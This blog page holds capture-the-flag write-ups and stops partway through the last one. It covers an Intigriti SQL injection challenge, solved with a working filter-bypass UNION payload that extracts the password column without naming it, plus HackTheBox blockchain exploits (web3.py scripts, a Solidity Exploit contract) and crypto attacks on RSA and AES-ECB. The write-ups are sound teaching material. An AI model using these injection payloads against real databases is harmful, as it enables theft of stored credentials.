writeup | BKISC Blogs

Writeup for Intigriti September Challenge 2023

Tue, 26 Sep 2023 00:00:00 +0000

Table of Contents

Hi all, first time doing a writeup here 😉. This will be the Intigriti September 2023 challenge created by @sgrum0x. I wrote this writeup not just for experienced players but also for newbies. In short, this challenge can be solved by using parentheses for whitespaces filter and get a column without using its name.

Statement

Featuring this month’s challenge will be an SQL injection challenge. At first glance, it is a table containing ID, username, email of some users.

There is also a Show Source button. Upon clicking it, we can have a look at the source code of the challenge.

 1...
 2$max = 10;
 3
 4if (isset($_GET['max']) && !is_array($_GET['max']) && $_GET['max']>0) {
 5 $max = $_GET['max'];
 6 $words = ["'","\"",";","`"," ","a","b","h","k","p","v","x","or","if","case","in","between","join","json","set","=","|","&","%","+","-","<",">","#","/","\r","\n","\t","\v","\f"]; // list of characters to check
 7 foreach ($words as $w) {
 8 if (preg_match("#".preg_quote($w)."#i", $max)) {
 9 exit("H4ckerzzzz");
10 } //no weird chars
11 }
12}
13
14try{
15 //seen in production
16 $stmt = $pdo->prepare("SELECT id, name, email FROM users WHERE id<=$max");
17 $stmt->execute();
18 $results = $stmt->fetchAll();
19}
20catch(\PDOException $e){
21 exit("ERROR: BROKEN QUERY");
22}
23 /* FYI
24 CREATE TABLE users (
25 id INT AUTO_INCREMENT PRIMARY KEY,
26 name VARCHAR(255) NOT NULL,
27 email VARCHAR(255) UNIQUE NOT NULL,
28 password VARCHAR(255) NOT NULL
29 );
30 */
31?>
32...
33<td><?= htmlspecialchars(strpos($row['id'],"INTIGRITI")===false?$row['id']:"REDACTED"); ?></td>
34<td><?= htmlspecialchars(strpos($row['name'],"INTIGRITI")===false?$row['name']:"REDACTED"); ?></td>
35<td><?= htmlspecialchars(strpos($row['email'],"INTIGRITI")===false?$row['email']:"REDACTED"); ?></td>
36...

Upon reading the source code, I was able to guess that the flag will be in the column password which we need to leak it somehow using `SQL Injection``. So where is the injection point? What are the problems that we need to encounter? Let’s dive deeper.

Overview

First glance

Upon reviewing the source code, we can easily find the SQL Injection endpoint.

1$max = 10;
2...
3$max = $_GET['max'];
4...
5$stmt = $pdo->prepare("SELECT id, name, email FROM users WHERE id<=$max");

But it wouldn’t have been a challenge if it was this easy right 🥲? The variable $max must go through a god d@mn filter to be passed to the query.

Filter

Let’s take a look at the filter:

1if (isset($_GET['max']) && !is_array($_GET['max']) && $_GET['max']>0) {
2 $max = $_GET['max'];
3 $words = ["'","\"",";","`"," ","a","b","h","k","p","v","x","or","if","case","in","between","join","json","set","=","|","&","%","+","-","<",">","#","/","\r","\n","\t","\v","\f"]; // list of characters to check
4 foreach ($words as $w) {
5 if (preg_match("#".preg_quote($w)."#i", $max)) {
6 exit("H4ckerzzzz");
7 } //no weird chars
8 }
9}

In short, there are 2 processes the filter performs:

First, it checks the query $_GET['max'] if it is an array and greater than 0.
If it satisfies the condition, it assigns $max with the query $_GET['max'], and then it performs a blacklist case insensitive check.

Filter bypass

Number Check

First up, in order to get through the if statement, the max must greater than 0. This is easy as stated in PHP Documentation.

So we only need a number > 0 at the first character of the payload, we’re good to move on.

No whitespaces

Any payloads that contain white space or newline characters are filtered.

Comments for whitespaces will fail as it blocks character /.

There are a few payloads with alternative characters, unicodes that I have tried and failed like: %a0, %09, %0a, ...

There are still other ways.

Taking this from Hacktricks, we may already find the payload we need: ?max=(1)and(1)=(1).

Nice👌.

However, if you apply this right away it would not work as it requires a leading numeric character in the payload. We can use arithmetic operators to utilize this.

Operator * multiply is not filtered. ?max=1*(2)and(1)=(1)

Desired characters are blocked

We can already construct a payload for Union-Based SQL Injection.

The payload for it may be: 1 union select 1,2,password from users

Bad news: "password" has character a “a” which is filtered.

Good news: Hacktricks also offers us another way around.

-- This is an example with 3 columns that will extract the column number 3
-1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;

Constructing payload

Our union select

Let’s start with making our union select, provided that there are no filters applied.

It would be:

1*2 UNION SELECT 1, 2, password FROM users

Without using a column name

Column "password" is the fourth column of the table users. So the payload from the previous section would be:

1*2 UNION SELECT 1, 2, F.4 FROM (SELECT 1, 2, 3, 4 UNION SELECT * FROM users)F
-- Extracting the fourth column with a table with 4 columns

Combine with no spaces using parentheses

This is a tedious and annoying part to explain so I just leave it right here for you to think about and try:

1*(2)union(SELECT(1),(2),((F.4))from(SELECT(1),(2),(3),(4)union(SELECT*from(users)))F)

Try it out

The payload seems to work pretty well, but the flag should be there right? Unfortunately, no.

The problem is right here:

1<td><?= htmlspecialchars(strpos($row['id'],"INTIGRITI")===false?$row['id']:"REDACTED"); ?></td>
2<td><?= htmlspecialchars(strpos($row['name'],"INTIGRITI")===false?$row['name']:"REDACTED"); ?></td>
3<td><?= htmlspecialchars(strpos($row['email'],"INTIGRITI")===false?$row['email']:"REDACTED"); ?></td>

If our result contains "INTIGRITI" (which is the flag) it will return "REDACTED". 🛐

Final touch

We need to find a function, a string function to be precise, that can make the string contain the word "INTIGRITI" no more.

A few come to mind like: SUBSTR, REVERSE, FORMAT, … but they are all filtered this way or another.

And there’s MID instead of SUBSTR … Wow. Just wow. So to not return the result containing "INTIGRITI", we can use MID(str,2) which skips the first character.

One more thing: You may use LOWER and it still got through and the flag is still correct in this challenge.

Put it all together

OUR final payload after using MID will be:

1*(2)union(SELECT(1),(2),((MID(F.4,2)))from(SELECT(1),(2),(3),(4)union(SELECT*from(users)))F)

Conclusion

Overall, the challenge is quite interesting from my perspective. At first glance, the blacklist may be overwhelming for those who are not familiar with solving CTF challenges. However, with a little bit of searching and trying, failing in the process is a must, the challenge may seem not so tough after all.

Thanks for reading and have a nice day.

P/S: There is a similar challenge on Root-me, check it out

Cyber Apocalypse 2023: The Cursed Mission - Blockchain

Mon, 27 Mar 2023 00:00:00 +0000

Table of Contents

Navigating the Unknown

Given zip: Get it here!
Description: Your advanced sensory systems make it easy for you to navigate familiar environments, but you must rely on intuition to navigate in unknown territories. Through practice and training, you must learn to read subtle cues and become comfortable in unpredictable situations. Can you use your software to find your way through the blocks?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Blockchain
Difficulty: Very Easy

In this blockchain challenge, we were provided with two smart contracts: Setup.sol and Unknown.sol. Our goal was to solve the challenge by interacting with the contracts and ensuring that the isSolved() function in the Setup contract returns true.

The Setup.sol contract is responsible for initializing the challenge and providing us with the necessary information to interact with the Unknown.sol contract. The Setup contract deploys an instance of the Unknown contract and exposes the isSolved() function, which checks if the updated variable in the Unknown contract is set to true.

The Unknown.sol contract contains a single function, updateSensors(uint256 version), which sets the updated variable to true if the provided version argument is equal to 10.

To solve the challenge, we needed to call the updateSensors function in the Unknown contract with the correct version 10. To do this, we used the web3.py library to interact with the blockchain and the smart contracts. This is the python script:

import eth_account
import web3
from web3 import Web3

PRIVATE_KEY= "REPLACE_YOUR_PRIVATE_KEY_HERE"
RPC_URL="http://REPLACE_YOUR_RPC_URL_HERE"
SET_UP_ADRESSS="REPLACE_YOUR_SET_UP_ADRESS_HERE"
UNKNOWN_ADRESSS="REPLACE_YOUR_UNKNOWN_ADRESS_HERE"

w3=Web3(web3.HTTPProvider(RPC_URL))

my_account=eth_account.Account.from_key(PRIVATE_KEY)

SET_UP_ABI = [
 {
 "inputs": [],
 "stateMutability": "nonpayable",
 "type": "constructor"
 },
 {
 "inputs": [],
 "name": "TARGET",
 "outputs": [
 {
 "internalType": "contract Unknown",
 "name": "",
 "type": "address"
 }
 ],
 "stateMutability": "view",
 "type": "function"
 },
 {
 "inputs": [],
 "name": "isSolved",
 "outputs": [
 {
 "internalType": "bool",
 "name": "",
 "type": "bool"
 }
 ],
 "stateMutability": "view",
 "type": "function"
 }
]
UNKNOWN_ABI = [
 {
 "inputs": [
 {
 "internalType": "uint256",
 "name": "version",
 "type": "uint256"
 }
 ],
 "name": "updateSensors",
 "outputs": [],
 "stateMutability": "nonpayable",
 "type": "function"
 },
 {
 "inputs": [],
 "name": "updated",
 "outputs": [
 {
 "internalType": "bool",
 "name": "",
 "type": "bool"
 }
 ],
 "stateMutability": "view",
 "type": "function"
 }
]

setup_contract=w3.eth.contract(address=SET_UP_ADRESSS,abi=SET_UP_ABI)
unknown_contract=w3.eth.contract(address=UNKNOWN_ADRESSS,abi=UNKNOWN_ABI)

transaction = unknown_contract.functions.updateSensors(10).build_transaction({
 'from': my_account.address,
 'value': 0,
 'gas': 300000,
 'gasPrice': w3.to_wei('10','gwei'),
 'nonce':w3.eth.get_transaction_count(my_account.address)
})
signed_transaction=w3.eth.account.sign_transaction(transaction,PRIVATE_KEY)
transaction_hash=w3.eth.send_raw_transaction(signed_transaction.rawTransaction)
transaction_receipt=w3.eth.wait_for_transaction_receipt(transaction_hash)
isSolve = setup_contract.functions.isSolved().call()
print("Challenge solved:" + {isSolve})

You can get both SET_UP_ABI and UNKNOWN_ABI by using Remix IDE to compile the contracts and get the ABIs. After running the script and we got the flag.

Flag is: HTB{9P5_50FtW4R3_UPd4t3D}

Shooting 101

Given zip: Get it here!
Description: Your metallic body might have advanced targeting systems, but hitting a target is not just about technical proficiency. To truly master the art of targeting, you must learn to trust your instincts and develop a keen sense of intuition. During this training, you will emerge as a skilled marksman who can hit the targets with deadly precision. It’s about time to train and prove yourself in the Shooting Area, can you make it?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Blockchain
Difficulty: Very Easy

In the Shooting 101 blockchain challenge, we have two smart contracts: Setup and ShootingArea. The goal of this challenge is to set the three boolean variables firstShot, secondShot, and thirdShot in the ShootingArea contract to true. The contract has a few functions with specific modifiers that ensure they can only be called under certain conditions.

To solve the challenge, we need to interact with the contracts and call the functions in the correct order:

Call the fallback function of the ShootingArea contract by sending a transaction with 32 bytes of zero data, setting firstShot to true.
Call the receive function of the ShootingArea contract by sending a transaction with a non-zero amount of Ether and an empty data field, setting secondShot to true.
Call the third() function of the ShootingArea contract to set thirdShot to true. Note that we might need to call this function multiple times to ensure it sets the variable to true.
Finally, call the isSolved() function in the Setup contract to verify if the challenge is solved.

The provided Python script uses the web3.py library to interact with the Ethereum contracts:

from web3 import Web3

# Replace the following values with the ones from the challenge
RPC_URL = "http://165.232.98.69:32406"
PRIVATE_KEY = "0xc3416ed8c225000b2b46142b478717e88548165fd4ed3e6afeaf7e9dba27b0af"
SETUP_CONTRACT_ADDRESS = "0x671C8C0f14f48098419FD7E3a51123f8f35F5173"
TARGET_CONTRACT_ADDRESS = "0x544D171d157A7Ebe08C32d1C5e6EEfaaa4e4E889"

w3 = Web3(Web3.HTTPProvider(RPC_URL))

# Get your account from the provided private key
my_account = w3.eth.account.from_key(PRIVATE_KEY)

# Setup contract ABI
SETUP_CONTRACT_ABI = [
 {
 "inputs": [],
 "stateMutability": "nonpayable",
 "type": "constructor"
 },
 {
 "inputs": [],
 "name": "TARGET",
 "outputs": [
 {
 "internalType": "contract ShootingArea",
 "name": "",
 "type": "address"
 }
 ],
 "stateMutability": "view",
 "type": "function"
 },
 {
 "inputs": [],
 "name": "isSolved",
 "outputs": [
 {
 "internalType": "bool",
 "name": "",
 "type": "bool"
 }
 ],
 "stateMutability": "view",
 "type": "function"
 }
]

# Target contract ABI
TARGET_CONTRACT_ABI = [
 {
 "stateMutability": "payable",
 "type": "fallback"
 },
 {
 "inputs": [],
 "name": "firstShot",
 "outputs": [
 {
 "internalType": "bool",
 "name": "",
 "type": "bool"
 }
 ],
 "stateMutability": "view",
 "type": "function"
 },
 {
 "inputs": [],
 "name": "secondShot",
 "outputs": [
 {
 "internalType": "bool",
 "name": "",
 "type": "bool"
 }
 ],
 "stateMutability": "view",
 "type": "function"
 },
 {
 "inputs": [],
 "name": "third",
 "outputs": [],
 "stateMutability": "nonpayable",
 "type": "function"
 },
 {
 "inputs": [],
 "name": "thirdShot",
 "outputs": [
 {
 "internalType": "bool",
 "name": "",
 "type": "bool"
 }
 ],
 "stateMutability": "view",
 "type": "function"
 },
 {
 "stateMutability": "payable",
 "type": "receive"
 }
]

# Create contract instances
setup_contract = w3.eth.contract(address=SETUP_CONTRACT_ADDRESS, abi=SETUP_CONTRACT_ABI)
target_contract = w3.eth.contract(address=TARGET_CONTRACT_ADDRESS, abi=TARGET_CONTRACT_ABI)


def print_status():
 first_shot_status = target_contract.functions.firstShot().call()
 second_shot_status = target_contract.functions.secondShot().call()
 third_shot_status = target_contract.functions.thirdShot().call()
 print(f"First shot: {first_shot_status}, Second shot: {second_shot_status}, Third shot: {third_shot_status}")


# First shot: Call the fallback function
transaction = {
 'from': my_account.address,
 'to': TARGET_CONTRACT_ADDRESS,
 'value': 0,
 'gas': 3000000,
 'gasPrice': w3.to_wei('10', 'gwei'),
 'nonce': w3.eth.get_transaction_count(my_account.address),
 'data': '0x' + '00' * 32, # Add 32 bytes of zero data to trigger the fallback function
}


signed_transaction = my_account.signTransaction(transaction)
transaction_hash = w3.eth.send_raw_transaction(signed_transaction.rawTransaction)
transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)


print_status()
# Trigger the receive function to hit the second target
transaction['value'] = w3.to_wei('2', 'ether')
transaction['nonce'] = w3.eth.get_transaction_count(my_account.address)
transaction['data'] = '0x' # Send an empty data field to trigger the receive function

signed_transaction = my_account.signTransaction(transaction)
transaction_hash = w3.eth.send_raw_transaction(signed_transaction.rawTransaction)
transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
print_status()

# Trigger the third function to hit the third target
for _ in range(3): # Increase the number of times we call the third() function
 transaction = target_contract.functions.third().build_transaction({
 'from': my_account.address,
 'gas': 3000000,
 'gasPrice': w3.to_wei('10', 'gwei'),
 'nonce': w3.eth.get_transaction_count(my_account.address),
 })

 signed_transaction = my_account.signTransaction(transaction)
 transaction_hash = w3.eth.send_raw_transaction(signed_transaction.rawTransaction)
 transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
print_status()


# Check if the challenge is solved
is_solved = setup_contract.functions.isSolved().call()
print("Challenge solved:", is_solved)

Run the script and get the flag.

Flag is: HTB{f33l5_n1c3_h1771n6_y0ur_74r6375}

Fun fact: The script used to solve this challenge was generated by ChatGPT.

The Art Of Deception

Given zip: Get it here!
Description: Your cyborg abilities are not always the most effective tools for achieving your goals. Sometimes, you need to go unnoticed and blend in with your surroundings. To achieve this, you must learn to assume new identities and blend in with different groups of people. Mastering the art of deception requires subtlety, observation, and the ability to read people’s motivations and intentions. After completing this training, you will emerge as a skilled infiltrator, capable of seamlessly blending in with your surroundings and achieving your objectives with stealth and subtlety. Can you bypass the High Security Gate and sneak into the Fortified Perimeter?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Blockchain
Difficulty: Easy

In this challenge, the objective is to trick the HighSecurityGate contract, making its lastEntrant equal to Pandora. The Setup contract imports and initializes the HighSecurityGate contract. The isSolved() function checks if the lastEntrant variable in the HighSecurityGate contract is equal to Pandora.

 function isSolved() public view returns (bool) {
 return TARGET.strcmp(TARGET.lastEntrant(), "Pandora");
 }

The HighSecurityGate contract has an array of authorized names (Orion, Nova, and Eclipse), and the enter() function checks if the name returned by the Entrant interface implementation matches any of the authorized names. If it does, the lastEntrant variable is updated with the returned name.

 string[] private authorized = ["Orion", "Nova", "Eclipse"];
 string public lastEntrant;

 function enter() external {
 Entrant _entrant = Entrant(msg.sender);

 require(_isAuthorized(_entrant.name()), "Intruder detected");
 lastEntrant = _entrant.name();
 }

 function _isAuthorized(string memory _user) private view returns (bool){
 for (uint i; i < authorized.length; i++){
 if (strcmp(_user, authorized[i])){
 return true;
 }
 }
 return false;
 }

To exploit this setup, an Exploit contract is created, implementing the Entrant interface with a name() function that returns an authorized name on the first call and Pandora on the second call. This contract also has a pwn() function that calls the enter() function of the HighSecurityGate contract, with the Exploit contract acting as the sender. This is the Exploit contract:

pragma solidity ^0.8.18;

import "./Setup.sol";

interface Entrant {
 function name() external returns (string memory);
}

contract Exploit is Entrant {
 address payable public targetAddr;
 Setup targetContract;
 bool public first;

 constructor(address payable _addr) payable {
 targetAddr = payable(_addr);
 targetContract = Setup(targetAddr);
 first = true;
 }

 function name() external returns (string memory){
 if (first) {
 first = false;
 return "Orion";
 } else {
 return "Pandora";
 }
 }

 function pwn() public {
 targetContract.TARGET().enter();
 }
}

To deploy the Exploit contract, we used foundry-rs (you can find it here: https://github.com/foundry-rs/foundry) :

forge create Exploit --rpc-url <rpc_url> --private-key <private_key> --constructor-args <setup_contract_address> --value 100ether

After deploying the Exploit contract, call the pwn() function twice. On the first call, the name() function will return an authorized name, updating the lastEntrant variable in the HighSecurityGate contract. On the second call, the name() function will return Pandora, updating the lastEntrant variable to the desired value. When the lastEntrant variable set to Pandora, the isSolved() function in the Setup contract will return true, indicating that the challenge has been successfully solved.

Flag is: HTB{H1D1n9_1n_PL41n_519H7}

Cyber Apocalypse 2023: The Cursed Mission - Cryptography

Mon, 27 Mar 2023 00:00:00 +0000

Table of Contents

Ancient Encodings

Given file: Get it here!
Description: Your initialization sequence requires loading various programs to gain the necessary knowledge and skills for your journey. Your first task is to learn the ancient encodings used by the aliens in their communication.
Category: Cryptography
Difficulty: Very Easy

We are given a Python script and a text file. Analyze the script, we get to know how the string is being encoded, which is Base 64 encode > Conversion to long from bytes > Hex.

To get the original string, we simply reverse the process, using CyberChef with the hex given in the text file.

Flag is: HTB{1n_y0ur_j0urn3y_y0u_wi1l_se3_th15_enc0d1ngs_ev3rywher3}

Small StEps

Given file: Get it here!
Description: As you continue your journey, you must learn about the encryption method the aliens used to secure their communication from eavesdroppers. The engineering team has designed a challenge that emulates the exact parameters of the aliens’ encryption system, complete with instructions and a code snippet to connect to a mock alien server. Your task is to break it.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Cryptography
Difficulty: Very Easy

We are given two Python script. The server.py is to setup a server for RSA encryption. It will output n, e, ct upon connecting to the netcat server/run the Python script locally.

Since e is always 3, we can use Low public exponent RSA attack to recover the initial message. In general, we only have to calculate cube root of ciphertext to get the plaintext.

Below is the implementation of the attack in Python.

from Crypto.Util.number import long_to_bytes
import gmpy2

n = 884883504927573976507811885368533220992278181011115684591381528075201937106582650631361008463165895850991665645858432026935373136174833729634068491453157
e = 3
ct = 70407336670535933819674104208890254240063781538460394662998902860952366439176467447947737680952277637330523818962104685553250402512989897886053

pt = gmpy2.iroot(ct, 3)[0] # Get cube root of ct
print(long_to_bytes(pt))

Flag is: HTB{5ma1l_E-xp0n3nt}

Perfect Synchronization

Given file: Get it here!
Description: The final stage of your initialization sequence is mastering cutting-edge technology tools that can be life-changing. One of these tools is quipqiup, an automated tool for frequency analysis and breaking substitution ciphers. This is the ultimate challenge, simulating the use of AES encryption to protect a message. Can you break it?
Category: Cryptography
Difficulty: Easy

The encryption is shown below:

from os import urandom
from Crypto.Cipher import AES
from secret import MESSAGE

assert all([x.isupper() or x in '{_} ' for x in MESSAGE])


class Cipher:

 def __init__(self):
 self.salt = urandom(15)
 key = urandom(16)
 self.cipher = AES.new(key, AES.MODE_ECB)

 def encrypt(self, message):
 return [self.cipher.encrypt(c.encode() + self.salt) for c in message]


def main():
 cipher = Cipher()
 encrypted = cipher.encrypt(MESSAGE)
 encrypted = "\n".join([c.hex() for c in encrypted])

 with open("output.txt", 'w+') as f:
 f.write(encrypted)


if __name__ == "__main__":
 main()

Problem statement

The Python script defines a Cipher class that generates a random salt and key, then encrypts a message using AES in ECB mode. The encrypted message is written to a file in hexadecimal format. The MESSAGE variable is imported from a separate file. Our mission is to recover the encrypted message and find the flag in it.

Initial Analysis

The randomness

The author adds some randomnesses including key and salt to make the encryption more unpredictable. But if you look more closely into it, you will realize that the salt is just initialized once, and be padded for all characters in the message. It means the salt is not too much useful, it just shifts all characters by a constant value.

The AES encryption mode

The author uses EBC mode - the weakest mode, to encrypt all shifted characters of the message.

For anyone who doesn’t know about ECB: ECB (Electronic Codebook) is one of the simplest modes of AES encryption, where each block of plaintext is encrypted separately using the same key.

In this mode, identical plaintext blocks will be encrypted to identical ciphertext blocks, making it vulnerable to attacks that exploit patterns in the plaintext. Therefore, ECB mode is not recommended for secure communication, and other modes like CBC, CTR, or GCM are preferred. A visualized example is illustrated in this wiki to show that AES-ECB mode is not semantically secure.

Conclusion

By the above analysis, we can prove that:

For every $c_A, c_B \in \text{message}$: $c_A = c_B \Leftrightarrow ECB(c_A + \text{salt}) = ECB(c_B + \text{salt})$

This means the encryption is just a substitution cipher.

Solution method

For simplicity in frequency analyzing, I map every different hex strings in the output file to a character (A-Z, 1-4), noted that identical strings would produce identical characters. By comparing to English Letter Frequency (including space character) table, we may recover some common letters like e, t, i, a, o confidentally. Then, by the reduncancy and meaning of English words, I can recover the entire content and find the flag.

Results

After the mapping, here is the encrypted message:

ABCDECFGHIJFJKHLMLIMLINJLCOIPFIQRCIAJGQIQRJQIMFIJFHISMTCFILQBCQGRIPAIVBMQQCFIKJFSEJSCIGCBQJMFIKCQQCBLIJFOIGPUNMFJQMPFLIPAIKCQQCBLIPGGEBIVMQRITJBHMFSIABCDECFGMCLIUPBCPTCBIQRCBCIMLIJIGRJBJGQCBMLQMGIOMLQBMNEQMPFIPAIKCQQCBLIQRJQIMLIBPESRKHIQRCILJUCIAPBIJKUPLQIJKKILJUWKCLIPAIQRJQIKJFSEJSCIMFIGBHWQJFJKHLMLIABCDECFGHIJFJKHLMLIJKLPIXFPVFIJLIGPEFQMFSIKCQQCBLIMLIQRCILQEOHIPAIQRCIABCDECFGHIPAIKCQQCBLIPBISBPEWLIPAIKCQQCBLIMFIJIGMWRCBQCYQIQRCIUCQRPOIMLIELCOIJLIJFIJMOIQPINBCJXMFSIGKJLLMGJKIGMWRCBLIABCDECFGHIJFJKHLMLIBCDEMBCLIPFKHIJINJLMGIEFOCBLQJFOMFSIPAIQRCILQJQMLQMGLIPAIQRCIWKJMFQCYQIKJFSEJSCIJFOILPUCIWBPNKCUILPKTMFSILXMKKLIJFOIMAIWCBAPBUCOINHIRJFOIQPKCBJFGCIAPBICYQCFLMTCIKCQQCBINPPXXCCWMFSIOEBMFSIVPBKOIVJBIMMINPQRIQRCINBMQMLRIJFOIQRCIJUCBMGJFLIBCGBEMQCOIGPOCNBCJXCBLINHIWKJGMFSIGBPLLVPBOIWEZZKCLIMFIUJ1PBIFCVLWJWCBLIJFOIBEFFMFSIGPFQCLQLIAPBIVRPIGPEKOILPKTCIQRCUIQRCIAJLQCLQILCTCBJKIPAIQRCIGMWRCBLIELCOINHIQRCIJYMLIWPVCBLIVCBCINBCJXJNKCIELMFSIABCDECFGHIJFJKHLMLIAPBICYJUWKCILPUCIPAIQRCIGPFLEKJBIGMWRCBLIELCOINHIQRCI1JWJFCLCIUCGRJFMGJKIUCQRPOLIPAIKCQQCBIGPEFQMFSIJFOILQJQMLQMGJKIJFJKHLMLISCFCBJKKHIRQN2J3LMUWKC3LENLQMQEQMPF3ML3VCJX4IGJBOIQHWCIUJGRMFCBHIVCBCIAMBLQIELCOIMFIVPBKOIVJBIMMIWPLLMNKHINHIQRCIELIJBUHLILMLIQPOJHIQRCIRJBOIVPBXIPAIKCQQCBIGPEFQMFSIJFOIJFJKHLMLIRJLINCCFIBCWKJGCOINHIGPUWEQCBILPAQVJBCIVRMGRIGJFIGJBBHIPEQILEGRIJFJKHLMLIMFILCGPFOLIVMQRIUPOCBFIGPUWEQMFSIWPVCBIGKJLLMGJKIGMWRCBLIJBCIEFKMXCKHIQPIWBPTMOCIJFHIBCJKIWBPQCGQMPFIAPBIGPFAMOCFQMJKIOJQJIWEZZKCIWEZZKCIWEZZKC

Plotting the histogram of this encrypted message, comparing with the expected frequency, we get:

Here is the script, if you’re interested in:

import matplotlib.pyplot as plt

def plot_histogram(text):
 english_freq = {'space': 0.18316895740067898, 'e': 0.10266650309881365, 't': 0.07516918822929543, 'a': 0.0653211522431101, 'o': 0.06165021261170107, 'i': 0.06109938076429621, 'n': 0.05748993391266301, 's': 0.0558094607431706, 'r': 0.05501226388301501, 'h': 0.0418265243918537, 'l': 0.03203162615518401, 'd': 0.03123691335535358, 'u': 0.02074798285524714, 'c': 0.020576050425919314, 'm': 0.019830666456506605, 'f': 0.016535714836861396, 'w': 0.015818636195592536, 'g': 0.014126275726274115, 'p': 0.01318902368984632, 'y': 0.012614330285168858, 'b': 0.010748157780246267, 'v': 0.007961080746834234, 'k': 0.005609987561400249, 'x': 0.0012367402118007968, 'j': 0.0010975645567653538, 'q': 0.0010065039671926798, 'z': 0.0005273232293542625}
 char_dict = {}
 for char in text:
 if char in char_dict:
 char_dict[char] += 1
 else:
 char_dict[char] = 1
 for key in char_dict:
 char_dict[key] /= len(text)
 # char_dict[key] *= 100
 char_dict = dict(sorted(char_dict.items(), key=lambda x: x[1], reverse=True))
 # plt.bar(char_dict.keys(), char_dict.values())
 fig, (ax1, ax2) = plt.subplots(nrows=2, ncols=1)

 # Plot the first subplot
 ax1.bar(char_dict.keys(), char_dict.values())
 ax1.set_xlabel('Encrypted message')
 ax1.set_ylabel('Frequency (%)')

 # Plot the second subplot
 ax2.bar(english_freq.keys(), english_freq.values())
 ax2.set_xlabel('English')
 ax2.set_ylabel('Frequency (%)')
 plt.show()

Based on the charts, we can easily find that letter I, C in encrypted message must be space and e in English, respectively. I guess there must be one and only one pair {} in the message for the flag HTB{...}. In the above chart, letter 2 and 4 share the smallest frequency, so they must be { and }. Moreover, the 3 characters immediately preceding { must be htb. After that, we got:

ABeDEeFGH JFJKHLML ML bJLeO PF the AJGt thJt MF JFH SMTeF LtBetGh PA VBMtteF KJFSEJSe GeBtJMF KetteBL JFO GPUbMFJtMPFL PA KetteBL PGGEB VMth TJBHMFS ABeDEeFGMeL UPBePTeB theBe ML J GhJBJGteBMLtMG OMLtBMbEtMPF PA KetteBL thJt ML BPEShKH the LJUe APB JKUPLt JKK LJUWKeL PA thJt KJFSEJSe MF GBHWtJFJKHLML ABeDEeFGH JFJKHLML JKLP XFPVF JL GPEFtMFS KetteBL ML the LtEOH PA the ABeDEeFGH PA KetteBL PB SBPEWL PA KetteBL MF J GMWheBteYt the UethPO ML ELeO JL JF JMO tP bBeJXMFS GKJLLMGJK GMWheBL ABeDEeFGH JFJKHLML BeDEMBeL PFKH J bJLMG EFOeBLtJFOMFS PA the LtJtMLtMGL PA the WKJMFteYt KJFSEJSe JFO LPUe WBPbKeU LPKTMFS LXMKKL JFO MA WeBAPBUeO bH hJFO tPKeBJFGe APB eYteFLMTe KetteB bPPXXeeWMFS OEBMFS VPBKO VJB MM bPth the bBMtMLh JFO the JUeBMGJFL BeGBEMteO GPOebBeJXeBL bH WKJGMFS GBPLLVPBO WEZZKeL MF UJ1PB FeVLWJWeBL JFO BEFFMFS GPFteLtL APB VhP GPEKO LPKTe theU the AJLteLt LeTeBJK PA the GMWheBL ELeO bH the JYML WPVeBL VeBe bBeJXJbKe ELMFS ABeDEeFGH JFJKHLML APB eYJUWKe LPUe PA the GPFLEKJB GMWheBL ELeO bH the 1JWJFeLe UeGhJFMGJK UethPOL PA KetteB GPEFtMFS JFO LtJtMLtMGJK JFJKHLML SeFeBJKKH htb{J3LMUWKe3LEbLtMtEtMPF3ML3VeJX} GJBO tHWe UJGhMFeBH VeBe AMBLt ELeO MF VPBKO VJB MM WPLLMbKH bH the EL JBUHL LML tPOJH the hJBO VPBX PA KetteB GPEFtMFS JFO JFJKHLML hJL beeF BeWKJGeO bH GPUWEteB LPAtVJBe VhMGh GJF GJBBH PEt LEGh JFJKHLML MF LeGPFOL VMth UPOeBF GPUWEtMFS WPVeB GKJLLMGJK GMWheBL JBe EFKMXeKH tP WBPTMOe JFH BeJK WBPteGtMPF APB GPFAMOeFtMJK OJtJ WEZZKe WEZZKe WEZZKe

The remaining task is to guess the words based on their meanings. Here is the result:

frequency analysis is based on the fact that in any giTen stretch of written language certain letters and combinations of letters occur with Tarying frequencies moreoTer there is a characteristic distribution of letters that is roughly the same for almost all samples of that language in cryptanalysis frequency analysis also tnown as counting letters is the study of the frequency of letters or groups of letters in a cipherteYt the method is used as an aid to breating classical ciphers frequency analysis requires only a basic understanding of the statistics of the plainteYt language and some problem solTing stills and if performed by hand tolerance for eYtensiTe letter bootteeping during world war ii both the british and the americans recruited codebreaters by placing crossword puZZles in ma1or newspapers and running contests for who could solTe them the fastest seTeral of the ciphers used by the aYis powers were breatable using frequency analysis for eYample some of the consular ciphers used by the 1apanese mechanical methods of letter counting and statistical analysis generally htb{a_simple_substitution_is_weat} card type machinery were first used in world war ii possibly by the us armys sis today the hard wort of letter counting and analysis has been replaced by computer software which can carry out such analysis in seconds with modern computing power classical ciphers are unlitely to proTide any real protection for confidential data puZZle puZZle puZZle

Flag is: HTB{a_simple_substitution_is_weat}

Conclusion

This challenge is just a substitution cipher, which is totally insecure against frequency analysis. The random key, salt, AES-ECB is just to make colors :D.

Multipage Recyclings

Given file: Get it here!
Description: As your investigation progressed, a clue led you to a local bar where you met an undercover agent with valuable information. He spoke of a famous astronomy scientist who lived in the area and extensively studied the relic. The scientist wrote a book containing valuable insights on the relic’s location, but encrypted it before he disappeared to keep it safe from malicious intent. The old man disclosed that the book was hidden in the scientist’s house and revealed two phrases that the scientist rambled about before vanishing.
Category: Cryptography
Difficulty: Easy

The server script is shown below:

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
import random, os

FLAG = b'HTB{??????????????????????}'

class CAES:

 def __init__(self):
 self.key = os.urandom(16)
 self.cipher = AES.new(self.key, AES.MODE_ECB)

 def blockify(self, message, size):
 return [message[i:i + size] for i in range(0, len(message), size)]

 def xor(self, a, b):
 return b''.join([bytes([_a ^ _b]) for _a, _b in zip(a, b)])

 def encrypt(self, message):
 iv = os.urandom(16)

 ciphertext = b''
 plaintext = iv

